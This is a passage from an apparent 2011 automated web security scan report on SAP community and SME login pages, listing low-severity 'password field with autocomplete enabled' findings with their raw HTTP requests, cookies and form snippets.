Cookie: VisitID=QUMxMDY0MTctMTMzMDdGN0Q2QjQtQzUxNjc5ODlDNjZFMjk0Mw==; session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; saplb_*=(J2EE3414700)3414750; Unique=QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD; JSESSIONID=(J2EE3414700)ID1654067250DB01193030658320856037End; SDNSTATE=392433836.14340.0000; _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; PortalAlias=scn; mbox=session#1318688512533-813903#1318690909|check#true#1318689109; CMPFIELDCRM-US11-XEC-CS11TRIAL-QUERYSTRINGFIELD=URL_ID=Q311_cs2011_freetrial_estore; CMPFIELDCRM-US11-XEC-CS11TRIAL-URL=LANDING PAGE=http%3a%2f%2fwww.sap.com%2fcampaign%2f2011_CURR_SAP_Crystal_Reports_Server_2011%2findex.epx%3fURL_ID%3dQ311_cs2011_freetrial_estore%26kNtBzmUK9zU%3d1; CMPFIELDCRM-US11-XEC-CS11TRIAL-HIDDENFIELD=OFT-EMEA=False&OFT-LatAm=False&OFT-APJ=False&InquiryType=Campaign&InquiryLevel=Premium&Segment=CROSS; SAP.SITE.COOKIE=cmpgn.code=CRM-US11-XEC-CS11TRIAL&cmpn=CRM-GM09-SMP-SAPCOM%3bCRM-US11-XEC-CS11TRIAL&profile_checked=http%3a%2f%2fwww.sap.com%2fabout-sap%2fevents%2fworldtour%2findex.epx; SAP.TTC=1318688493; CodeTrackingCookie=ExternalReferrerURL=https%3a%2f%2fwww.sme.sap.com%2firj%2fsme%2flogon; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; omniture=s.prop1%3D%27na%27%3Bs.prop2%3D%27en%27%3Bs.prop5%3D%27us%27%3Bs.prop6%3D%27visitor%27%3B; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ablog%7C1318691703148%3B%20pe%3Dno%2520value%7C1318691703151%3B%20c3%3Dscn%253Ablog%253Abrian%2520bernard%253Atune%2520in%2520to%2520sap%2520teched%2520live%2521%7C1318691703155%3B%20s_nr%3D1318689903165-New%7C1321281903165%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448293503170%3B%20s_visit%3D1%7C1318691703171%3B%20gpv_p47%3Dno%2520value%7C1318691703175%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D4%3B%20s_sq%3Dsapcommunity%252Csapglobal%253D%252526pid%25253Dscn%2525253Aglo%2525253Ablog%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.sdn.sap.com/irj/scn/sdnweblogs/popularposts%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Server: SAP J2EE Engine/7.00
Content-Language: en
Content-Type: text/html; charset=UTF-8
SDN_UID: Guest
SDN_GUID: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD
SDN_VISIT: QUMxMDY0MTctMTMzMDdGODU0RTgtMzlBNUNEQkQwRDZFQkUxMA==
Expires: 0
Content-Length: 28644
Date: Sat, 15 Oct 2011 14:58:26 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: PortalAlias=scn; Path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><LINK REL=stylesheet HREF="/irj/portalapps/com.sap.portal.design.portaldesigndata/th
...[SNIP]...
<div class="boxtop">
           <form name="loginform" method="post" id="loginform" accept-charset="ISO-8859-1">
    <input type="hidden" name="login_submit" value="on">
...[SNIP]...
<td><input class="textinput" name="j_password" type="password" maxlength="50" onkeypress="checkEnter(event)"></td>
...[SNIP]...
13.24. http://www.sdn.sap.com/irj/scn/weblogs  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.sdn.sap.com
Path:   /irj/scn/weblogs

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /irj/scn/weblogs?blog=/weblogs/topic/27 HTTP/1.1
Host: www.sdn.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sapteched.com/emea/about/whoshouldattend.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VisitID=QUMxMDY0MTctMTMzMDdGN0Q2QjQtQzUxNjc5ODlDNjZFMjk0Mw==; session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; mbox=session#1318688512533-813903#1318690473|check#true#1318688673; SAP.SITE.COOKIE=cmpgn.code=CRM-GM09-SMP-SAPCOM&cmpn=CRM-GM09-SMP-SAPCOM; saplb_*=(J2EE3414700)3414750; Unique=QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD; JSESSIONID=(J2EE3414700)ID1654067250DB01193030658320856037End; SDNSTATE=392433836.14340.0000; PortalAlias=scn; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fforums.sdn.sap.com%2fforum.jspa%3fforumID%3d209%26start%3d0; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; s_pers=%20c13%3Dscn%253Aglo%253Aforums%7C1318690486859%3B%20pe%3Dno%2520value%7C1318690486862%3B%20c3%3Dno%2520value%7C1318690486864%3B%20s_nr%3D1318688686869-New%7C1321280686869%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292286872%3B%20s_visit%3D1%7C1318690486873%3B%20gpv_p47%3Dno%2520value%7C1318690486876%3B%20s_ttc%3D1318688493%7C1350224686878%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D1%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: SAP J2EE Engine/7.00
Content-Language: en
Content-Type: text/html; charset=UTF-8
SDN_UID: Guest
SDN_GUID: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD
SDN_VISIT: QUMxMDY0MTctMTMzMDdGN0Q2QjQtQzUxNjc5ODlDNjZFMjk0Mw==
Expires: 0
Content-Length: 28880
Vary: Accept-Encoding
Date: Sat, 15 Oct 2011 14:24:59 GMT
Connection: close
Set-Cookie: PortalAlias=scn; Path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><LINK REL=stylesheet HREF="/irj/portalapps/com.sap.portal.design.portaldesigndata/th
...[SNIP]...
<div class="boxtop">
           <form name="loginform" method="post" id="loginform" accept-charset="ISO-8859-1">
    <input type="hidden" name="login_submit" value="on">
...[SNIP]...
<td><input class="textinput" name="j_password" type="password" maxlength="50" onkeypress="checkEnter(event)"></td>
...[SNIP]...
13.25. http://www.sdn.sap.com/irj/scn/weblogs  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.sdn.sap.com
Path:   /irj/scn/weblogs

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /irj/scn/weblogs?blog=/pub/wlg/26917 HTTP/1.1
Host: www.sdn.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://weblogs.sdn.sap.com/pub/t/27
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VisitID=QUMxMDY0MTctMTMzMDdGN0Q2QjQtQzUxNjc5ODlDNjZFMjk0Mw==; session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; saplb_*=(J2EE3414700)3414750; Unique=QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD; JSESSIONID=(J2EE3414700)ID1654067250DB01193030658320856037End; SDNSTATE=392433836.14340.0000; _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; PortalAlias=scn; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Aforums%7C1318690514391%3B%20pe%3Dno%2520value%7C1318690514393%3B%20c3%3Dno%2520value%7C1318690514395%3B%20s_nr%3D1318688714402-New%7C1321280714402%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292314404%3B%20s_visit%3D1%7C1318690514405%3B%20gpv_p47%3Dno%2520value%7C1318690514407%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D3%3B%20s_sq%3D%3B; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sapphirenow.com%2flogin.aspx%3fReturnUrl%3d%2fdefault.aspx; SAP.SITE.COOKIE=cmpgn.code=CRM-GM09-SMP-SAPCOM&cmpn=CRM-GM09-SMP-SAPCOM&profile_checked=http%3a%2f%2fwww.sap.com%2fabout-sap%2fevents%2fworldtour%2findex.epx; mbox=session#1318688512533-813903#1318690682|check#true#1318688882; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|

Response

HTTP/1.1 200 OK
Server: SAP J2EE Engine/7.00
Content-Language: en
Content-Type: text/html; charset=UTF-8
SDN_UID: Guest
SDN_GUID: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD
SDN_VISIT: QUMxMDY0MTctMTMzMDdGN0Q2QjQtQzUxNjc5ODlDNjZFMjk0Mw==
Expires: 0
Content-Length: 28754
Vary: Accept-Encoding
Date: Sat, 15 Oct 2011 14:27:08 GMT
Connection: close
Set-Cookie: PortalAlias=scn; Path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><LINK REL=stylesheet HREF="/irj/portalapps/com.sap.portal.design.portaldesigndata/th
...[SNIP]...
<div class="boxtop">
           <form name="loginform" method="post" id="loginform" accept-charset="ISO-8859-1">
    <input type="hidden" name="login_submit" value="on">
...[SNIP]...
<td><input class="textinput" name="j_password" type="password" maxlength="50" onkeypress="checkEnter(event)"></td>
...[SNIP]...
13.26. http://www.sdn.sap.com/irj/scn/weblogs  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.sdn.sap.com
Path:   /irj/scn/weblogs

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /irj/scn/weblogs HTTP/1.1
Host: www.sdn.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: SAP J2EE Engine/7.00
Content-Language: en
Content-Type: text/html; charset=UTF-8
SDN_UID: Guest
SDN_GUID: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD
SDN_VISIT: QUMxMDY0MTctMTMzMDdGODU0RTgtMzlBNUNEQkQwRDZFQkUxMA==
Expires: 0
Date: Sat, 15 Oct 2011 15:04:53 GMT
Content-Length: 30459
Connection: close
Set-Cookie: PortalAlias=scn; Path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><LINK REL=stylesheet HREF="/irj/portalapps/com.sap.portal.design.portaldesigndata/th
...[SNIP]...
<div class="boxtop">
           <form name="loginform" method="post" id="loginform" accept-charset="ISO-8859-1">
    <input type="hidden" name="login_submit" value="on">
...[SNIP]...
<td><input class="textinput" name="j_password" type="password" maxlength="50" onkeypress="checkEnter(event)"></td>
...[SNIP]...
13.27. http://www.sdn.sap.com/irj/scn/weblogs  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.sdn.sap.com
Path:   /irj/scn/weblogs

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /irj/scn/weblogs?blog=/pub/q/top_weblogs HTTP/1.1
Host: www.sdn.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VisitID=QUMxMDY0MTctMTMzMDdGN0Q2QjQtQzUxNjc5ODlDNjZFMjk0Mw==; session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; saplb_*=(J2EE3414700)3414750; Unique=QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD; JSESSIONID=(J2EE3414700)ID1654067250DB01193030658320856037End; SDNSTATE=392433836.14340.0000; _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; CMPFIELDCRM-US11-XEC-CS11TRIAL-QUERYSTRINGFIELD=URL_ID=Q311_cs2011_freetrial_estore; CMPFIELDCRM-US11-XEC-CS11TRIAL-URL=LANDING PAGE=http%3a%2f%2fwww.sap.com%2fcampaign%2f2011_CURR_SAP_Crystal_Reports_Server_2011%2findex.epx%3fURL_ID%3dQ311_cs2011_freetrial_estore%26kNtBzmUK9zU%3d1; CMPFIELDCRM-US11-XEC-CS11TRIAL-HIDDENFIELD=OFT-EMEA=False&OFT-LatAm=False&OFT-APJ=False&InquiryType=Campaign&InquiryLevel=Premium&Segment=CROSS; SAP.SITE.COOKIE=cmpgn.code=CRM-US11-XEC-CS11TRIAL&cmpn=CRM-GM09-SMP-SAPCOM%3bCRM-US11-XEC-CS11TRIAL&profile_checked=http%3a%2f%2fwww.sap.com%2fabout-sap%2fevents%2fworldtour%2findex.epx; omniture=s.prop1%3D%27na%27%3Bs.prop2%3D%27en%27%3Bs.prop5%3D%27us%27%3Bs.prop6%3D%27visitor%27%3B; mbox=session#1318688512533-813903#1318691765|check#true#1318689965; PortalAlias=scn; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ascn%253Asdnweblogs%253Apopularposts%7C1318691705604%3B%20pe%3Dno%2520value%7C1318691705612%3B%20c3%3Dno%2520value%7C1318691705618%3B%20s_nr%3D1318689905628-New%7C1321281905628%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448293505630%3B%20s_visit%3D1%7C1318691705632%3B%20gpv_p47%3Dno%2520value%7C1318691705635%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D5%3B%20s_sq%3D%3B; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sapvirtualevents.com%2fteched%2f; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|

Response

HTTP/1.1 200 OK
Server: SAP J2EE Engine/7.00
Content-Language: en
Content-Type: text/html; charset=UTF-8
SDN_UID: Guest
SDN_GUID: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD
SDN_VISIT: QUMxMDY0MTctMTMzMDdGODU0RTgtMzlBNUNEQkQwRDZFQkUxMA==
Expires: 0
Content-Length: 28883
Vary: Accept-Encoding
Date: Sat, 15 Oct 2011 14:58:58 GMT
Connection: close
Set-Cookie: PortalAlias=scn; Path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><LINK REL=stylesheet HREF="/irj/portalapps/com.sap.portal.design.portaldesigndata/th
...[SNIP]...
<div class="boxtop">
           <form name="loginform" method="post" id="loginform" accept-charset="ISO-8859-1">
    <input type="hidden" name="login_submit" value="on">
...[SNIP]...
<td><input class="textinput" name="j_password" type="password" maxlength="50" onkeypress="checkEnter(event)"></td>
...[SNIP]...
13.28. http://www.sdn.sap.com/irj/sdn/logon  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.sdn.sap.com
Path:   /irj/sdn/logon

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /irj/sdn/logon HTTP/1.1
Host: www.sdn.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: SAP J2EE Engine/7.00
Content-Language: en
Content-Type: text/html; charset=UTF-8
SDN_UID: Guest
SDN_GUID: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD
SDN_VISIT: QUMxMDY0MTctMTMzMDdGODU0RTgtMzlBNUNEQkQwRDZFQkUxMA==
Expires: 0
Date: Sat, 15 Oct 2011 15:04:54 GMT
Content-Length: 21956
Connection: close
Set-Cookie: PortalAlias=sdn; Path=/
Set-Cookie: PortalAlias=sdn; Path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><LINK REL=stylesheet HREF="/irj/portalapps/com.sap.portal.design.portaldesigndata/th
...[SNIP]...
<div class="boxtop">
           <form name="loginform" method="post" id="loginform" accept-charset="ISO-8859-1">
    <input type="hidden" name="login_submit" value="on">
...[SNIP]...
<td><input class="textinput" name="j_password" type="password" maxlength="50" onkeypress="checkEnter(event)"></td>
...[SNIP]...
13.29. http://www.sdn.sap.com/irj/sdn/mypoints  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.sdn.sap.com
Path:   /irj/sdn/mypoints

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /irj/sdn/mypoints HTTP/1.1
Host: www.sdn.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: SAP J2EE Engine/7.00
Content-Language: en
Content-Type: text/html; charset=UTF-8
SDN_UID: Guest
SDN_GUID: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD
SDN_VISIT: QUMxMDY0MTctMTMzMDdGODU0RTgtMzlBNUNEQkQwRDZFQkUxMA==
Expires: 0
Date: Sat, 15 Oct 2011 15:05:10 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: PortalAlias=sdn; Path=/
Set-Cookie: PortalAlias=sdn; Path=/
Content-Length: 44998

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><LINK REL=stylesheet HREF="/irj/portalapps/com.sap.portal.design.portaldesigndata/th
...[SNIP]...
<div class="boxtop">
           <form name="loginform" method="post" id="loginform" accept-charset="ISO-8859-1">
    <input type="hidden" name="login_submit" value="on">
...[SNIP]...
<td><input class="textinput" name="j_password" type="password" maxlength="50" onkeypress="checkEnter(event)"></td>
...[SNIP]...
13.30. https://www.sme.sap.com/irj/sme/logon  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.sme.sap.com
Path:   /irj/sme/logon

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /irj/sme/logon HTTP/1.1
Host: www.sme.sap.com
Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://www.sme.sap.com/irj/sme/logon
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VisitID=QUMxMDY0MUYtMTMzMDdGRkVBMDYtQkMwRUU0NjA4RUM1NjNEQg==; session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; CMPFIELDCRM-US11-XEC-CS11TRIAL-QUERYSTRINGFIELD=URL_ID=Q311_cs2011_freetrial_estore; CMPFIELDCRM-US11-XEC-CS11TRIAL-URL=LANDING PAGE=http%3a%2f%2fwww.sap.com%2fcampaign%2f2011_CURR_SAP_Crystal_Reports_Server_2011%2findex.epx%3fURL_ID%3dQ311_cs2011_freetrial_estore%26kNtBzmUK9zU%3d1; SAP.SITE.COOKIE=cmpgn.code=CRM-US11-XEC-CS11TRIAL&cmpn=CRM-GM09-SMP-SAPCOM%3bCRM-US11-XEC-CS11TRIAL&profile_checked=http%3a%2f%2fwww.sap.com%2fabout-sap%2fevents%2fworldtour%2findex.epx; saplb_*=(J2EE3417600)3417650; Unique=QUMxMDY0MUYtMTMzMDdGRkVBMDYtRjcwQzA2OTAyMUYzREQ1Mg==; JSESSIONID=(J2EE3417600)ID0819424750DB00193042231829069131End; SDNSTATE=526651564.14340.0000; a1slocale=en; omniture=s.prop1%3D%27na%27%3Bs.prop2%3D%27en%27%3Bs.prop5%3D%27us%27%3Bs.prop6%3D%27visitor%27%3B; mbox=session#1318688512533-813903#1318691790|check#true#1318689990; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ascn%253Aadvancedsearch%7C1318691731633%3B%20pe%3Dno%2520value%7C1318691731640%3B%20c3%3Dno%2520value%7C1318691731645%3B%20s_nr%3D1318689931653-New%7C1321281931653%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448293531656%3B%20s_visit%3D1%7C1318691731658%3B%20gpv_p47%3Dno%2520value%7C1318691731661%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D7%3B%20s_sq%3D%3B; CodeTrackingCookie=url_campaignId=Q311_cs2011_freetrial_estore; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; CMPFIELDCRM-US11-XEC-CS11TRIAL-HIDDENFIELD=OFT-EMEA=False&OFT-LatAm=False&OFT-APJ=False&InquiryType=Campaign&InquiryLevel=Premium&Segment=CROSS; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; PortalAlias=sme

Response

HTTP/1.1 200 OK
Server: SAP J2EE Engine/7.00
Content-Language: en
Content-Type: text/html; charset=UTF-8
SDN_UID: Guest
SDN_GUID: QUMxMDY0MUYtMTMzMDdGRkVBMDYtRjcwQzA2OTAyMUYzREQ1Mg==
SDN_VISIT: QUMxMDY0MUYtMTMzMDgwMERCMEItODg3REUyRjg0NjYyNDg2Nw==
SDN_RES_KEY: /webcontent/uuid/e043c818-7a27-2c10-ef93-f9f8fc0ce2da
Expires: 0
Content-Length: 33836
Vary: Accept-Encoding
Date: Sat, 15 Oct 2011 15:00:10 GMT
Connection: keep-alive
Set-Cookie: PortalAlias=sme; Path=/; secure

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><LINK REL=stylesheet HREF="/irj/portalapps/com.sap.portal.design.portaldesigndata/th
...[SNIP]...
<div id="loginbox">
               <form name="loginform" action="/irj/sme/cpslogon?SAMLRequest=fZFRS8MwFIX%2FSsl7m2TtnIS1MBiDgkqx4oNvMb1jgTaJuanovzfNRCbiAnk5ued%2B55Atyml0YjeHk3mEtxkwZO2%2BJj37Pnm8POcALH8dYJOv%2Bc1ttWYbxaqSZM%2FgUVtTk1XBSNYiztAaDNKEKDEejSzn6ydeiXIlqvKFZPtI0EaG5DqF4FBQKpWyswlYoHSFshNdUq2oHhxFtH%2BeSXawXkEKXZOjHBEWeCcR9Tv8KB%2FTaFCkgjWZvRFWokZh5AQoghL97v5OxODCeRussiNptsu0SD38hf%2B6PWLBL4VI0%2B%2B6PlifooEJWqWih65kW3qx%2Bsxx4iHuavedHbX6XDpNMvyP4gVPih7yYxoVs0EHSh81DIQ2Z8Lvv2y%2BAA%3D%3Dd5cd04f5c2801babb2db594b&RelayState=oucqqqqqqqqoqqqroreeqobdexovrwyuvqxcqut" method="post" class="loginform" accept-charset="ISO-8859-1">
           <input type="hidden" name="login_submit" value="on">
...[SNIP]...
<br/>
               <input class="textinput" name="j_password" type="password" maxlength="50" onkeypress="checkEnter(event)">
               <br/>
...[SNIP]...
13.31. https://www.sme.sap.com/irj/sme/logon  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.sme.sap.com
Path:   /irj/sme/logon

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /irj/sme/logon HTTP/1.1
Host: www.sme.sap.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sap.com/index.epx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VisitID=QUMxMDY0MUYtMTMzMDdGRkVBMDYtQkMwRUU0NjA4RUM1NjNEQg==; session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ablog%7C1318690649534%3B%20pe%3Dno%2520value%7C1318690649536%3B%20c3%3Dscn%253Ablog%253Abrian%2520bernard%253Atune%2520in%2520to%2520sap%2520teched%2520live%2521%7C1318690649538%3B%20s_nr%3D1318688849551-New%7C1321280849551%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292449554%3B%20s_visit%3D1%7C1318690649555%3B%20gpv_p47%3Dno%2520value%7C1318690649557%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D4%3B%20s_sq%3D%3B; mbox=session#1318688512533-813903#1318690909|check#true#1318689109; CMPFIELDCRM-US11-XEC-CS11TRIAL-QUERYSTRINGFIELD=URL_ID=Q311_cs2011_freetrial_estore; CMPFIELDCRM-US11-XEC-CS11TRIAL-URL=LANDING PAGE=http%3a%2f%2fwww.sap.com%2fcampaign%2f2011_CURR_SAP_Crystal_Reports_Server_2011%2findex.epx%3fURL_ID%3dQ311_cs2011_freetrial_estore%26kNtBzmUK9zU%3d1; CodeTrackingCookie=url_campaignId=Q311_cs2011_freetrial_estore; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; CMPFIELDCRM-US11-XEC-CS11TRIAL-HIDDENFIELD=OFT-EMEA=False&OFT-LatAm=False&OFT-APJ=False&InquiryType=Campaign&InquiryLevel=Premium&Segment=CROSS; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; SAP.SITE.COOKIE=cmpgn.code=CRM-US11-XEC-CS11TRIAL&cmpn=CRM-GM09-SMP-SAPCOM%3bCRM-US11-XEC-CS11TRIAL&profile_checked=http%3a%2f%2fwww.sap.com%2fabout-sap%2fevents%2fworldtour%2findex.epx; saplb_*=(J2EE3417600)3417650; Unique=QUMxMDY0MUYtMTMzMDdGRkVBMDYtRjcwQzA2OTAyMUYzREQ1Mg==; PortalAlias=sme; JSESSIONID=(J2EE3417600)ID0819424750DB00193042231829069131End; SDNSTATE=526651564.14340.0000

Response

HTTP/1.1 200 OK
Server: SAP J2EE Engine/7.00
Content-Language: en
Content-Type: text/html; charset=UTF-8
SDN_UID: Guest
SDN_GUID: QUMxMDY0MUYtMTMzMDdGRkVBMDYtRjcwQzA2OTAyMUYzREQ1Mg==
SDN_VISIT: QUMxMDY0MUYtMTMzMDdGRkVBMDYtQkMwRUU0NjA4RUM1NjNEQg==
SDN_RES_KEY: /webcontent/uuid/e043c818-7a27-2c10-ef93-f9f8fc0ce2da
Expires: 0
Content-Length: 33344
Vary: Accept-Encoding
Date: Sat, 15 Oct 2011 14:32:55 GMT
Connection: keep-alive
Set-Cookie: PortalAlias=sme; Path=/; secure

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><LINK REL=stylesheet HREF="/irj/portalapps/com.sap.portal.design.portaldesigndata/th
...[SNIP]...
<div id="loginbox">
               <form name="loginform" action="/irj/sme/cpslogon?SAMLRequest=d5cd04f5843c731b70797b86&RelayState=oucqqqqqqqqoqqqroreeqobdexovrwyuvqxcqut" method="post" class="loginform" accept-charset="ISO-8859-1">
           <input type="hidden" name="login_submit" value="on">
...[SNIP]...
<br/>
               <input class="textinput" name="j_password" type="password" maxlength="50" onkeypress="checkEnter(event)">
               <br/>
...[SNIP]...
13.32. https://www.sme.sap.com/irj/sme/logon  previous  next

Summary

Severity:   Low
